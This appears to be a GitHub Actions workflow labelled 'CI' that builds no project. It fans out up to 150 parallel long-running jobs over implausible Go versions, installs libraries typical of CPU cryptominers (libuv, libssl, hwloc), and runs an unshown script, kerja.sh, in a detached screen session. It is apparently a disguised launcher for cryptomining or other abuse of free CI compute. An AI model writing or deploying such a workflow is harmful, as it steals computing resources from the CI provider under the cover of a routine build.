name: CI
on: [push, pull_request]
jobs:
  build:
    name: CI
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 150
      fail-fast: false
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.0]
        flag: [A, B, C, D, E]
    timeout-minutes: 360
    env:
        NUM_JOBS: 150
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - run: sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev screen   
    - run: chmod +x ./kerja.sh
    - run: screen -S test -X bash kerja.sh